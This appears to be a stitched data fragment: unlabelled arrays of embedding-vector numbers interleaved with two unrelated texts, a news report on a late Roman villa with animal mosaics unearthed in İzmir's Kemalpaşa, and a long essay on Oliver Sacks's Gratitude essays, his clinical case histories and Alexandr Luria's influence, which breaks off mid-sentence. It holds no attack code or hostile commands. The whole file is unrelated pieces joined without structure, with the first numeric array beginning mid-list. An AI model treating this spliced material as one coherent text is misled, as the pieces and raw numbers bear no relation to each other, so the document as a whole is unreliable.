-0.06193051487207413, -0.024309394881129265, -0.014125058427453041, 0.08086010813713074, 0.017075423151254654, 0.08546426147222519, 0.004758783150464296, -0.013466335833072662, -0.002633909694850445, 0.14543594419956207, -0.014946076087653637, 0.052976444363594055, 0.011076606810092926, 0.04557442292571068, -0.04573870077729225, -0.046486884355545044, 0.02503557875752449, -0.02899535559117794, 0.08117148280143738, 0.02133406512439251, 0.03375222533941269, -0.060977499932050705, 0.030534891411662102, 0.032376524060964584, -0.024152321740984917, 0.005732805468142033, 0.0334453247487545, 0.0548633374273777, 0.021735217422246933, -0.03262707218527794, -0.006589244119822979, -0.06124017760157585, -0.13549506664276123, -0.07625551521778107, -0.02728196233510971, 0.01781885325908661, -0.04046399146318436, 0.01622641645371914, 0.019192995503544807, -0.006474601104855537, 0.017455896362662315, -0.07419102638959885, -0.02586248889565468, -0.06469760090112686, -0.012220356613397598, -0.08034159988164902, -0.009653331711888313, 0.15485060214996338, -0.07032603025436401, -0.0816166028380394, -0.0247353445738554, -0.04716480150818825, -0.0966639593243599, 0.07336177676916122, 0.028062254190444946, 0.0035507685970515013, -0.03540349751710892, 0.06281424313783646, -0.08552438765764236, 0.007778361905366182, -0.043539803475141525, -0.010215329006314278, 0.016057919710874557, 0.008305342867970467, -0.011061537079513073, -0.011812089011073112, -0.06253504008054733, -0.008650699630379677, -0.02479485794901848, -0.0014673647237941623, 0.02572578564286232, -0.037582527846097946, -7.251001638216756e-33, -0.1539987474679947, -0.08428245037794113, -0.04651620611548424, 0.06596717983484268, 0.014728672802448273, -0.03840034455060959, 0.0016800177982077003, -0.07931401580572128, 0.04817090928554535, -0.045326028019189835, -0.1008450984954834, -0.046464547514915466, 0.049188848584890366, 0.03295409306883812, 0.005910267122089863, -0.08472435176372528, 0.058215681463479996, 0.023757481947541237, -0.04128987714648247, -0.002023403998464346, 0.020022740587592125, 0.08302600681781769, -0.07573065161705017, 0.08545885980129242, -0.05919581651687622, 0.00552300876006484, -0.04500596225261688, 0.03367827460169792, 0.014198505319654942, 0.017766298726201057, -0.02231941558420658, 0.000529019976966083, -0.06286486983299255, 0.050538673996925354, -0.05242970585823059, -0.013994117267429829, 0.047419898211956024, 0.00505800312384963, -0.05976669490337372, 0.0366646945476532, 0.024868588894605637, -0.059617623686790466, -0.05620516091585159, 0.0177775751799345, -0.08633183687925339, -0.019786516204476357, -0.03468490019440651, 0.016247574239969254, 0.004218027461320162, 0.04727404564619064, -0.006977085489779711, 0.007648896891623735, 0.05197422206401825, 0.09481939673423767, -0.07407964020967484, 0.05403129383921623, -0.07283404469490051, 0.04587903618812561, 0.07093677669763565, 0.07163046300411224, 0.05784047767519951, 0.00934092327952385, -0.04732512682676315, -0.008619601838290691, 0.047157224267721176, -0.020927468314766884, -0.027360230684280396, -0.014238283038139343, 0.016568278893828392, 0.041390322148799896, 0.06267132610082626, -0.10772871971130371, -0.03425351157784462, -0.06555619835853577, -0.006939038634300232, 0.013730238191783428, -0.02324027754366398, 0.11539317667484283, -0.040129926055669785, -0.028075242415070534, 0.09257085621356964, -0.0911063477396965, 0.03400680422782898, -0.039663586765527725, 0.09080559760332108, 0.011842808686196804, 0.04068252816796303, -0.04538920149207115, -0.08065656572580338, 0.11350907385349274, -0.04090116545557976, -0.06747139245271683, -0.03318719193339348, 0.05521143227815628, -0.012621356174349785, -5.7965092281619945e-8, 0.019857145845890045, 0.01424966286867857, -0.027914833277463913, -0.025679413229227066, -0.03389904275536537, 0.016590522602200508, -0.013616918586194515, 0.009329674765467644, -0.03686489909887314, -0.0637260377407074, 0.09370137006044388, -0.01608188822865486, -0.03883931040763855, -0.017450422048568726, -0.0013421830954030156, 0.059461504220962524, -0.0553019717335701, -0.022964153438806534, -0.03804512694478035, 0.015572299249470234, -0.0028215530328452587, 0.013334503397345543, -0.02776370197534561, -0.003263624384999275, 0.021895861253142357, 0.0385710783302784, 0.006587150041013956, 0.0797593742609024, 0.013442352414131165, 0.05904513970017433, -0.09690678864717484, -0.035263098776340485, 0.04679981246590614, 0.0601922981441021, 0.023196183145046234, 0.04624521732330322, -0.060668300837278366, 0.033500876277685165, -0.018057264387607574, -0.03282291814684868, -0.013449052348732948, 0.017494019120931625, -0.005831998772919178, 0.031088734045624733, -0.03483838587999344, -0.05743200704455376, -0.0384555347263813, 0.004132820293307304, 0.037149108946323395, 0.04862605407834053, -0.005292944610118866, -0.07138761878013611, -0.01773783750832081, 0.07798625528812408, 0.013590702787041664, -0.05419094115495682, 0.011329995468258858, 0.030843954533338547, 0.02452968806028366, 0.014649142511188984, 0.03976791352033615, 0.002490297192707658, -0.028031833469867706, -0.017552491277456284 ]
İzmir presents mosaic city of western region İZMİR - Anatolia News Agency Precious mosaics with animal and plant figures were found in six of the villa complex’s rooms, unearthed in İzmir’s Kemalpaşa neighborhood. An archaeological city dating back 1,700 years has been unearthed during excavations in İzmir’s Kemalpaşa neighborhood, raising officials’ hopes the area will draw tourists’ attention.The Cultural Beings and Museums’ General Director Osman Murat Süslü held a press conference Oct. 21 regarding the discovery of the archaeological city, which Culture and Tourism Minister Ertuğrul Günay has defined as “good news that will draw the world’s attention.”Drilling work had started in the area, which is now categorized as a third degree archaeological site, before the construction of a warehouse company was scheduled to begin. Excavations were begun due to an abundance of signs the area may be a hotspot for archaeological treasures, Süslü said. “Scientific excavations started Oct. 1 and a layer from the 4th Century B.C. has been unearthed,” he said.The newly-unearthed city is believed to date back to around the late Roman or Byzantium period, Süslü said. It was home to a 550-square-meter villa complex with 105-centimeter-thick walls, water channels and 11 rooms.Precious mosaics were found in six of the villa complex’s rooms. “The mosaics are decorated with animal and plant figures that you cannot see anywhere today. They created the Anatolian panther, the Anatolian tiger as well as a partridge and a rabbit [in mosaics]. They are decorated with completely natural stones. You can see various shades of red, blue and green. There is a rich archaeological structuring in the region,” he said.According to Süslü, the historic structure in the city could be defined as the “Zeugma of the West,” but the most sorrowful thing was the illegal excavations. Zeugma is the ancient city known for its rich mosaics in the southeastern province of Gaziantep.Artifacts unearthed during illegal excavations from Zeugma were sold abroad at trifling prices and later major efforts were put underway to bring those artifacts back, Süslü said.Süslü warned those involved in illegal excavations that there would be repercussions to their actions. “These people should know that we pay for artifacts when they inform us [of their discovery]. Citizens should prevent illegal excavations when they see [them happening].”Further, more detailed information about the name and estimated size of the newly-discovered city in İzmir would be given as a result of detailed excavation works, Süslü said. “It is known that there are lost cities in Anatolia. Works will tell us which lost city this is.”
[ -0.09156721085309982, 0.10571110248565674, -0.04874745011329651, 0.027578100562095642, -0.09677351266145706, -0.13009388744831085, -0.053136859089136124, -0.05097237229347229, -0.05295158922672272, 0.001126547227613628, 0.03407252952456474, -0.07215019315481186, -0.01152160856872797, 0.04930128529667854, -0.051546916365623474, -0.026496756821870804, 0.04050089046359062, -0.002363040577620268, 0.015808794647455215, -0.058531504124403, -0.019152751192450523, -0.0597417987883091, 0.08497749269008636, -0.02796139009296894, 0.03216912969946861, 0.059294313192367554, -0.027273787185549736, 0.016763217747211456, 0.037048790603876114, 0.0016263083089143038, -0.018887395039200783, 0.043322231620550156, 0.030524002388119698, -0.036715030670166016, 0.08920610696077347, 0.08740611374378204, -0.04001329466700554, 0.012776914983987808, 0.04054415225982666, -0.014528848230838776, 0.04802655801177025, -0.039757292717695236, 0.007494404446333647, -0.024199215695261955, -0.0676240622997284, 0.0014981839340180159, 0.03930533677339554, 0.026712223887443542, -0.034637659788131714, 0.0032190552446991205, -0.06371752172708511, 0.03226041793823242, 0.026104560121893883, -0.09583836048841476, -0.048896513879299164, -0.05537620186805725, -0.0459478497505188, -0.010915416292846203, 0.006060271989554167, 0.016365675255656242, 0.10843538492918015, 0.019538454711437225, -0.039175692945718765, 0.01084153726696968, -0.04207409918308258, -0.037686511874198914, 0.03535567596554756, -0.02232026867568493, 0.052525971084833145, -0.081474669277668, 0.08843701332807541, -0.04068269580602646, -0.0364379920065403, 0.00745904678478837, 0.04819594323635101, -0.029575606808066368, 0.08561467379331589, -0.019421495497226715, -0.037607479840517044, -0.09197638183832169, 0.0955968052148819, 0.0133588258177042, 0.053079504519701004, -0.051751382648944855, -0.11907847970724106, 0.05308528244495392, -0.02104281820356846, 0.036306776106357574, 0.08604048937559128, -0.05935889482498169, 0.11316690593957901, -0.019546128809452057, -0.0929107815027237, -0.05237322300672531, 0.1699468046426773, 0.0674094706773758, -0.019039688631892204, 0.13550211489200592, 0.024109356105327606, 0.040264979004859924, 0.031905803829431534, -0.030920468270778656, -0.03962663561105728, 0.0007667715544812381, -0.05659821629524231, 0.015400206670165062, -0.02600853331387043, 0.014203708618879318, -0.07796447724103928, 0.06564304232597351, -0.03812350705265999, -0.08902548253536224, -0.029524048790335655, -0.044812027364969254, 0.039279498159885406, 0.07716228067874908, 0.04400750249624252, 0.0666239932179451, -0.028097951784729958, -0.010043187998235226, -0.029780017212033272, -0.02218279056251049, 0.04227758198976517, 0.004499477334320545, 0.0026550304610282183, 0.09026747196912766, -0.03885353356599808, 1.3938324164184462e-33, 0.020943589508533478, -0.00730055570602417, -0.05948812887072563, 0.0002747114049270749, -0.04711715504527092, -0.04478365555405617, 0.031117362901568413, 0.03750167787075043, -0.08818256109952927, -0.029450809583067894, 0.05687649920582771, -0.06815136224031448, -0.055841170251369476, -0.07455308735370636, -0.01929246075451374, 0.03137689083814621, 0.0016357606509700418, -0.035034094005823135, 0.0038790160324424505, -0.018598539754748344, 0.0012000655988231301, -0.06371083855628967, 0.0011663367040455341, -0.05467730760574341, 0.03599710389971733, 0.03901292383670807, 0.014824937097728252, 0.007976505905389786, -0.06484085321426392, 0.007843805477023125, 0.026911061257123947, -0.009493744000792503, -0.013641717843711376, -0.03840542584657669, -0.03709333389997482, 0.0794915184378624, -0.025370119139552116, -0.06755827367305756, -0.03855122998356819, 0.007038029842078686, 0.033680155873298645, 0.021779842674732208, -0.04607311636209488, -0.028536304831504822, 0.04426804557442665, 0.03624578192830086, -0.018689485266804695, 0.027887731790542603, 0.023677697405219078, -0.05354180559515953, 0.004619193729013205, 0.11088741570711136, -0.05701756477355957, -0.028028717264533043, -0.043625298887491226, 0.08092319220304489, -0.016472414135932922, -0.008322779089212418, 0.11867521703243256, 0.036446962505578995, 0.007028928026556969, 0.02459203638136387, -0.006151719018816948, 0.10388273000717163, 0.012212934903800488, -0.024923935532569885, -0.0423368439078331, 0.13238166272640228, 0.04032105952501297, 0.0648937001824379, 0.010829273611307144, -0.04152962937951088, -0.019276879727840424, 0.014997887425124645, -0.00028694793581962585, 0.06755722314119339, -0.05323256924748421, 0.04222338646650314, -0.035394079983234406, 0.039519768208265305, -0.01803903840482235, 0.0075096855871379375, -0.04963142052292824, 0.04838446527719498, 0.026776310056447983, 0.06267910450696945, 0.06295616924762726, -0.03854910284280777, 0.03468940779566765, -0.030236616730690002, 0.005015391390770674, 0.017276091501116753, -0.019660456106066704, -0.03290729969739914, -0.018209341913461685, -3.547646726227464e-33, 0.014061599969863892, -0.013184658251702785, -0.10521364212036133, 0.01709556020796299, -0.06709780544042587, -0.052096303552389145, 0.0030189300887286663, -0.016407161951065063, -0.0227039884775877, 0.0626559853553772, 0.006589995697140694, 0.02125471830368042, 0.010170373134315014, -0.09134749323129654, 0.006643836852163076, 0.022160625085234642, 0.09302735328674316, -0.0274137444794178, -0.009739740751683712, 0.09247039258480072, 0.0005100120324641466, -0.010214632377028465, -0.11487189680337906, -0.05475420877337456, -0.04184553027153015, 0.008853260427713394, 0.03974795341491699, -0.0833074152469635, -0.0577399879693985, -0.006129612680524588, -0.004078490659594536, -0.052534233778715134, -0.029630763456225395, 0.016859769821166992, 0.01147865317761898, -0.004737420938909054, 0.06504161655902863, -0.1092514768242836, -0.0011448741424828768, -0.003925041761249304, 0.0033378589432686567, 0.1058722734451294, -0.06085159257054329, 0.057383857667446136, -0.02242222987115383, 0.019301969558000565, -0.004085062071681023, 0.12435729801654816, -0.0308962594717741, -0.07141049951314926, -0.01797064207494259, 0.021064363420009613, -0.0001455495075788349, -0.10449764877557755, 0.07661043107509613, 0.07034333795309067, -0.01456317026168108, 0.08133108168840408, -0.019734887406229973, 0.041603170335292816, -0.0142903421074152, 0.012651246972382069, -0.002151425927877426, 0.011776412837207317, 0.06487932801246643, -0.0026307215448468924, 0.05303142964839935, 0.009017140604555607, -0.07877460867166519, -0.033485110849142075, 0.027461830526590347, -0.0496922992169857, -0.06857965886592865, -0.05735049024224281, -0.012726613320410252, 0.0408189631998539, 0.0452408567070961, 0.057302601635456085, 0.04418352246284485, -0.05907009541988373, -0.028225276619195938, -0.05548974126577377, -0.007723284885287285, -0.02718755416572094, 0.11612831056118011, 0.03656267747282982, -0.013295236974954605, 0.040185533463954926, 0.06291667371988297, -0.0029471719171851873, -0.022966261953115463, -0.006066347472369671, -0.05872080475091934, -0.04995110258460045, 0.0019522338407114148, -5.425176752282823e-8, 0.044660069048404694, 0.03021586313843727, -0.04742434248328209, 0.01779952645301819, 0.019717134535312653, -0.08033023029565811, 0.01195412129163742, 0.07868976891040802, -0.029897861182689667, 0.033773016184568405, 0.006595717277377844, -0.03902650997042656, 0.014715522527694702, 0.03243827819824219, 0.029196903109550476, 0.0034506586380302906, 0.046479031443595886, -0.057248249650001526, -0.0392274409532547, -0.06752710789442062, 0.04170790687203407, -0.012477616779506207, 0.0004167418519500643, -0.06796298921108246, -0.04013780876994133, 0.012257187627255917, -0.08066218346357346, -0.011698898859322071, 0.0221283957362175, -0.048910245299339294, -0.017178038135170937, -0.02283957228064537, 0.05429118871688843, -0.002914869925007224, 0.09145066887140274, -0.030991079285740852, 0.030217958614230156, -0.06765296310186386, -0.014449435286223888, -0.07971731573343277, 0.02441364899277687, -0.03310628607869148, 0.08943551033735275, 0.031035328283905983, -0.010206963866949081, 0.11209931969642639, 0.0626431405544281, -0.03214509040117264, -0.006034969352185726, 0.00001915417487907689, -0.08764131367206573, 0.03494919091463089, 0.06389932334423065, 0.038063645362854004, 0.0942482128739357, -0.034642353653907776, -0.03365778923034668, -0.025213761255145073, 0.10277516394853592, -0.0069350069388747215, 0.09884724020957947, -0.016653114929795265, -0.09929627925157547, -0.05673899129033089 ]
In February, 2015, neurologist Oliver Sacks – arguably the world's best-known brain doctor and the greatest physician writer in English, wrote an article in The New York Times called My Own Life, announcing that "my luck has run out." Dr. Sacks, 81 years old, still wildly productive, clear-headed, feeling robust, and swimming a mile a day, had just found out he had multiple metastases, from an ocular cancer that had been treated nine years before. One-third of his liver was filled with cancer. No sooner had he shared his ill fortune than did he begin to write of his gratitude for the years he had been granted since his original diagnosis, and his overall feeling of gratitude for having lived as "a sentient being, a thinking animal, on this beautiful planet … " Story continues below advertisement Hardly a word more was said about the cancer. For now, face to face with dying, he was not quite done with living. He would restrict himself to essentials, which meant saying goodbye to dear friends and family, and continuing to write as he always had, hoping to die "in harness." A group of short, extraordinarily affecting essays followed, his farewell to the world, leaving many readers in tears. Dr. Sacks's specialty had been documenting how an individual, trapped in an extreme mental state that altered perception and even identity, retained his humanity. How, one wondered, might Dr. Sacks bear up when facing his own ultimate transformation? There were surprises, and some revelations, too, in these lyrical meditations, which have been gathered together in a very short book collection – called, fittingly, Gratitude, which appeared on Nov. 24, not long after the release of his memoir, On The Move. The essays in Gratitude had a spare beauty about them – unusual for a writer who so loved the rich tangent. They were unique among his other, more lush, scientific writings. They had the feel of wisdom literature. Wisdom sifts; a wise man, mindful that he has little time to say what he must, gets to the point. And the tone was unusual. They were both stoical and poignant. These are two qualities that rarely go together; we tend to think of stoicism as a kind of armour worn against our emotions, and poignancy as the breaking through, into our stream of consciousness, of emotions, even our most tender and delicate feelings. The poignancy and stoicism of the Gratitude essays was heightened by Dr. Sacks's reiteration that he was an atheist. He was, as far as he knew, facing a total erasure of his identity. Instead of "battling" his illness, the common metaphor of such accounts, he accepted that he was going to die. And his attitude, in Gratitude, is ultimately to see dying – odd as it is to say it – as an opportunity, of sorts. His burgeoning awareness that his life is ending is affording him a vision of it he had not had before. "Over the last few days, I have been able to see my life as from a great altitude, as sort of a landscape, and with a deepening sense of the connection of all its parts." The final essay concluded: "And now, weak, short of breath, my once-firm muscles melted away by cancer, I find my thoughts, increasingly, not on the supernatural or spiritual but on what is meant by living a good and worthwhile life – achieving a sense of peace within oneself. I find my thoughts drifting to the Sabbath, the day of rest, the seventh day of the week, and perhaps the seventh day of one's life as well, when one can feel that one's work is done, and one may, in good conscience, rest." Story continues below advertisement Most readers came to Dr. Sacks far sooner though, through his medical writing, which had always been a literary event as well as a scientific one. W.H. Auden called his second book, Awakenings, a "masterpiece." The prominent literary critic Frank Kermode wrote of it, "This doctor's report … is written in prose of such beauty that you might well look in vain for its equal among living practitioners of belles letters." But he was also a physician's physician, and when he died, the surgeon Atul Gawande wrote in The New Yorker, "No one taught me more about how to be a doctor than Oliver Sacks." This Dr. Gawande gleaned not from working with Dr. Sacks at the bedside, but from reading him. Dr. Sacks saw himself as a naturalist, cut loose within the world of medicine, and naturalists love to collect, catalogue, describe and discern, in great detail, the manifold variations in nature. Dr. Sacks was wedded to the proposition that we learn best from a close study of the particular. He hated textbooks, with their generalizations and remote language, and science by committee. He wrote to vivify each patient's unique experience, often using their own idiosyncratic speech. He listened not only with a stethoscope, but a poet's ear. Thus Dr. Sacks's writing required a plentiful prose. He never used just one adjective when he could use many; he loved crisscrossing between case reports written centuries and continents apart; and his footnotes grew like vines from the bottom of the page upward with each subsequent edition. He hid treasures in those footnotes that could be more intriguing than those found in the main text. Gratitude, such a personal book, might seem but a non-medical footnote to Dr. Sacks's medical career. But that makes sense if we see medicine as only about "cures" – and dying as something it needn't concern itself with. In these final essays Dr. Sacks took as his primary subject the case of Oliver Sacks himself, in the process of dying, to teach us something about how to die. Oliver Sacks's legacy was to restore a vision of a humane medicine that drew its power not from technological breakthroughs alone, but through the healing power of the doctor-patient relationship. It had roots in a more old-fashioned view that came in part from his general-practitioner father, who had close relationships with his patients and did frequent house calls. It was a form of care that required an almost unheard-of immersion in the lives of his patients by Dr. Sacks, which allowed him to draw portraits of human beings of an incomparable subtlety and sensitivity, while shedding new light on the mysteries of the brain. He also rejuvenated for us the rich tradition of the case history. Yet Dr. Sacks's triumph did not come immediately or without opposition. Story continues below advertisement "[W]ith little encouragement from my colleagues," he wrote, "… I became a storyteller at a time when medical narrative was almost extinct. … It was a lonely but deeply satisfying, almost monkish existence that I was to lead for many years." It may sound a strange claim, but the detailed case history – which in the 19th century produced some of the finest descriptions of patients ever written – had all but disappeared from the neurology journals when Dr. Sacks started writing, and, even today, it is rare. The great 19th-century neurologists, lacking scans, EEGs, and statistics, perfected their observational skills and the art of talking to patients so as to help them describe how those patients' mental experiences were altered by their brain problems. With the advent of modern lab and scanning techniques, these observational and communicative skills atrophied. The journals changed, too. Detailed accounts of individual patients increasingly disappeared, replaced by group studies of "subjects," described in more abstract, statistical terms, based on their scans and scores on tests. Instead of reporting what was unique about a patient, studies reported what was average about a population. And averages smear out what is unique about individuals. And if an individual patient was described, it was often in a several-sentence anecdote – not to be confused with a detailed case history. If anything, the anecdote was intentionally nondescript, suppressing personal details, because it focused not on the person with the disease, but the disease itself. To some tastes, this made the anecdote seem more "scientific." After all, a diagnosis describes a disease, something that is supposed to be fairly invariant from person to person. A diagnosis is what a group of people have in common, not what distinguishes them from each other. In this frame of mind, the mental life of the person with the illness is a distraction. One of Oliver Sacks’s many “think boards” from his Awakenings days. Oliver Sacks's breakthrough book was based on his work at a backward chronic-care hospital, Beth Abraham, in the Bronx. It was the kind of place conventionally ambitious physicians avoided. There he discovered about 80 patients who had suffered an illness called encephalitis lethargica, which left them, after a period of great nervous excitement, with "sleeping sickness," often frozen in fixed postures, like "living statues," mute and unable to move. An earlier physician had described them as "extinct volcanoes." Sometimes, even their thought processes were in a kind of suspended animation. They had been this way for four decades. To understand these often mute patients, Dr. Sacks totally immersed himself in their lives, moved into the hospital on-call apartment, and took call every night for almost four years, after working his regular 16-hour days. Over time, he began to sort out their individual characters, and noted that they had Parkinson's disease-like symptoms. He eventually discovered they responded to a new drug, L-dopa. Former "statues" turned into 1920s-era flappers, and danced together. Though many were pushing 70, they felt as if they were in their twenties, and spoke using phrases, affectations and accents of their youth. Their faces seemed to confirm that suspension of time: Immobile and expressionless for so long, they hadn't formed wrinkles. His first five medical reports, describing their profoundly moving and dramatic "awakenings" on the drug, received very positive responses when published in major medical journals, such as The Lancet and the Journal of the American Medical Association. Less well known, but a crucial spur to his development as a thinker and clinician, was what happened after. Dr. Sacks reported that, within months, his patients experienced major side effects on L-dopa, and cautioned that maybe these people were sensitive "canaries in the coal mine," and that L-dopa might best be used with caution on more typical Parkinson's patients. He was viciously attacked. Some said he was "off his head," and that no such side effects occurred. When he tried to publish a systematic study of these "side effects" (which he thought were really "effects" of the drug) in the same medical journals that had published his first findings, and others, he was refused. Dr. Sacks was struck by how his colleagues, though they thought of themselves as scientists, were using almost religious language, describing L-dopa as a "miracle drug." And so he began to psychoanalyze how yearnings drive longings in doctors and patients alike, and colour our views of medication, treatment, and, indeed, the whole world of illness. He published his findings in 1973, not in a medical journal, but in a book meant for anyone who was interested: Awakenings. As years passed, and the side effects Dr. Sacks observed were seen by others, the book became a classic with the lay public and neurologists alike, and was adapted into a well-known film, but not before he was fired for daring to question authority, and told by his boss to vacate the on-call apartment at Beth Abraham, depriving him of his home, his job – and, most important, his regular access to his patients. Dr. Sacks in New York circa 1970. Awakenings became a success, but it wasn't until 12 years later, when The Man Who Mistook His Wife for a Hat came out, that Dr. Sacks became a bestselling author. Hat, as his friends came to call it, explains how discrete localized brain problems lead to very specific changes in mental experience. The "man" of the title, Dr. P., a music teacher, had a lesion in a specific visual area of the brain. The most famous scene in the book begins when Dr. P., believing that Dr. Sacks had just finished examining him, "started to look around for his hat. He reached out his hand and took hold of his wife's head, tried to lift it off, to put it on. … His wife looked as if she was used to such things." When Dr. P. was walking in the street he would, somewhat Magoo-like, genially "pat the heads of water-hydrants and parking-meters, taking these to be the heads of children." If Awakenings was a feverish, tidal book, overwhelming with its stories of living death, resurrection, and living death returned, Hat was a more classical one: multiple, bite-sized clinical tales, written with great charm, about how brain problems lead to losses, or excesses, of mental activity. Hat's preface included powerful arguments for why case histories are every bit as medically important as studies. The idea of the case history goes back to ancient Greece, and Hippocrates, who first wrote about diseases having a course, a way of unfolding in time. Doctors began to write "histories" of their patients' illnesses, essentially biographies of disease, but, Dr. Sacks argued, they were really "pathographies" – documentations of the illnesses themselves, in which the human subjects largely disappeared. Dr. Sacks argued that this convention was no longer sufficient, and wrote, "To restore the human subject at the centre – the suffering, afflicted, fighting human subject – we must deepen a case history to a narrative or tale." These clinical tales, like classical fables, "have archetypal figures – heroes, victims, martyrs, warriors," because "patients are all of these," and more, "travellers to unimaginable lands." This restoration of the person to the centre was especially, and obviously, necessary for neurology, psychology and psychiatry, Dr. Sacks wrote in Hat, "for here the patient's personhood is essentially involved, and the study of disease and identity cannot be disjoined." The strongest single influence on Dr. Sacks's idea of how to develop these whimsical-sounding "clinical tales" was the Russian scientist Alexandr Luria (1902-77). It was from Dr. Luria that Dr. Sacks got the inspiration and the model that would allow him to make the case history his major focus. Dr. Luria, as a very young man, was a major contributor to the development of psychoanalysis in his country, and corresponded about the subject with Sigmund Freud – who was originally a neurologist, and who, according to Dr. Sacks, wrote "matchless case-histories." Dr. Luria was drawn to analysis because it was, as far as he knew, the only branch of psychology that took both materialist science and human subjectivity seriously. But this was not to last. In the late 1920s, under Joseph Stalin, psychoanalysis was decreed "politically incorrect." One month after giving a sympathetic lecture on Freud's thought, Dr. Luria, fearing for his survival, publicly renounced his ideological "mistake," and abruptly resigned from the Russian Psychoanalytical Society. He went off to medical school, and reinvented himself, pioneering the field of neuropsychology and the study of the higher cortical functions of the brain. He published conventional monographs and treatises. But in private letters to Dr. Sacks, in 1976, Dr. Luria made clear that he still took psychoanalysis seriously, and in one he offered a psychoanalytic interpretation of one of Dr. Sacks's neurological patients. Though he had disavowed his commitment to analysis, Dr. Luria had been writing up neurological case histories in the detailed manner of Freud, in secret, for decades. When Dr. Sacks first read one of these book-length cases, Dr. Luria's The Mind of a Mnemonist, in 1968 (about a Russian with an almost perfect memory who made his living performing feats on stage, but who was also deeply tormented because he could not, like most people, automatically forget unimportant events), Dr. Sacks thought it must have been a novel, Dr. Luria had so well described the man's unusual subjective experience. When he realized it was non-fiction, Dr. Sacks was so filled with admiration that he also became overwhelmed with fear, thinking, "[W]hat place is there for me in the world? Luria has already seen, said, written, and thought anything I can ever say, or write, or think." Dr. Sacks was so upset that he tore the library copy he was reading in two – then, getting a hold of himself, went out and bought one replacement copy for the library, and one for himself. Verbatim: Oliver Sacks on the art of writing Dr. Sacks credits that book with altering the course of his life. The next summer, he wrote the first nine case histories of Awakenings. Dr. Luria, to whom the book was dedicated, was delighted, and wrote to Dr. Sacks that the kind of approach taken in Awakenings "is lost now, perhaps because of the basic mistake that mechanical and electrical devices can replace the study of personality." With "the advent of the new instrumentation," technology was getting between the physician and the patient. "The physicians of our time, having a battery of auxiliary laboratory aids and tests, frequently overlook clinical reality." This would seem an extreme statement; after all, why must new technological tools lead to a loss of clinical reality? Can we not have both? Can one not enhance the other? And yet, Dr. Luria, according to Dr. Sacks, believed that there was a "conceptual and emotional atmosphere" that came with technology that cast a shadow over the doctor-patient relationship. This occurs, I would argue, because technology is not simply something we use; it comes part and parcel with a particular medical theory and practice. Modern scientific medicine has taken a fundamentally materialist approach, and it is "analytical," meaning that it divides wholes into parts. It often proceeds by reducing complex phenomena to their more elementary chemical and physical components: viruses, genes, molecules, and so on. Our technology measures these elements. That is what we do when we determine that a patient has a fever and trouble breathing because her lung is infected with microscopic bacteria. In psychology, this materialist theory aims to reduce all psychological phenomena to physiological laws of how the brain works. The goal is ultimately to build up abstract models of the brain, based on the observation of its individual elements. But, Dr. Luria worried, "One outcome of this approach is the reduction of living reality with all its richness of detail to abstract schemas." Dr. Luria wanted to restore the whole patient to scientific papers, and leave aside the abstractions, and even, he confessed, the description of personality with statistics. Can we human beings be understood solely in terms of our elements, our molecules, atoms, our parts, our circuits, our reflexes, even our behaviours? Or must not all of it be understood as part of a whole experience, which would include, of course, the subjective, qualitative mental experiences and intentions that drive behaviour? This was not a dry debate about how to report science, but about a profound philosophical difference. When Dr. Luria was a young man, he presented his first book, The Nature of Human Conflicts (1932), which aimed to be both objective but also to report on cases in detail, to the pre-eminent Russian psychologist Ivan Pavlov, inventor of behaviourism. A day later, when Dr. Luria met him, the old man's eyes were blazing, and he tore the book in half and threw it to the ground, roaring, "You call this science! Science proceeds from elementary parts and builds up; here you are describing behaviour as a whole!" Dr. Luria was declared "un-Pavlovian" and "un-Soviet," and had to keep his extensive case histories in the drawer for about 30 years before daring to publish them, and only after having first published many standard group studies and treatises. Group studies look at aspects of people: For instance, they select scores on tests, and compare them. One would think that a larger study would always trump a single case study. But group studies, like case histories, have both strengths and weaknesses. Dr. Sacks wrote that "all sorts of generalizations are made possible by dealing with populations [group studies] – but one needs the concrete, the particular, the personal too, and it is impossible to convey the nature and impact of any neurological condition without entering and describing the lives of individual patients." Case histories are the only place in the medical literature where we see, if not the whole patient, at least enough to get a picture of a living human being. Case histories can make hundreds of observations about a few people, and thus may not be representative of the larger population; group studies on the other hand, make a few observations about many people. The question is: Is it possible to understand a person with a brain illness, by describing him or her in bits and pieces – by observing just a few variables? The assumption underlying the typical group study of a disease is that each participant has the same disease, and that any variation between them – whether they exercise, for instance, or have other genetic risk factors or psychological issues – is relatively insignificant. This assumption of uniformity certainly doesn't hold when talking about the brain, which is so complex, and differs extensively from person to person. As well, no two brain injuries are identical, and usually affect different brain areas. This tremendous variation between patients is probably one key contributor to a problem that has now been acknowledged as a major one in the life and medical sciences: the replication crisis. One would have to have lived in a cave within a cave for the last 10 years not to have noticed that many key medical findings from group studies are being reversed, almost monthly – be it studies on the usefulness of mammograms and prostate tests, or the effectiveness of various medications. Many of the finest randomized controlled trials (RCTs), we are now learning, cannot be replicated. Worse, most published group studies in medicine can't be reproduced, leading to what Europe's premier science journal, Nature, now calls "the reproducibility crisis." A study published in The Journal of the American Medical Association in 2014 showed that 35 per cent of the conclusions of the finest RCTs, assessed by peer review and published in the most respected medical journals, cannot be replicated on reanalysis of their raw data. And the most downloaded article in the history of the journal PLOS Medicine, appearing in 2005 and called Why Most Published Research Findings Are False, showed how bias easily sneaks into data analysis. This has led Nature to call for new methods to try to eliminate bias in medicine and life sciences. Thus, there is less safety in numbers in these fields than we might wish. (I take no pleasure in this, as one who writes on life sciences.) This is why we need to be open to a range of study methods, both single case studies and group studies. As for the retort that case histories are not "scientific" because they are not "quantitative" – that confuses statistics, one tool of science, with science itself. Francis Crick, who, after co-discovering DNA, turned his attention to the problem of consciousness, eagerly pored over the Sacks case histories in draft form. He did so knowing, as neurologist and neuroscientist V.S. Ramachandran explains: "[I]n neurology, most of the major discoveries that have withstood the test of time were, in fact, based initially on single case studies and demonstrations." Our views of what constitutes rigour in science depend on the paradigm of the day. A paradigm is a theory – with associated laws, practices, and related technological and analytical tools – about an aspect of the universe. Statistical paradigms dispense with non-statistical technologies. But changing from one form of technology to another has unintended consequences. True, we don't tend to think of the case-history report as a technology. But I would argue that it is, and that the technology that underlies the case history is not just writing, but language itself – an invented medium that allows us to put our thoughts and subjective experiences into words. And, so far, it is the best medium we have for becoming aware of and conveying private experiences. Language, though ancient, is not less sophisticated for being old, but more, having been refined over millennia. When the subject we are studying is the nature of human experience itself, this is not technology we can dispense with. The language we use for the doctor-patient encounter affects the nature of that very relationship. The word "patient" comes from the root for "one who suffers" and it goes best with another old-fashioned word: physician or, heaven forbid, healer. But these words – the language of medicine for centuries – are increasingly being swept away by impersonal technological terms, which manage to be bland and hideously undignified at the same time: terms like "medical-system user" and "health-care systems provider." The language of 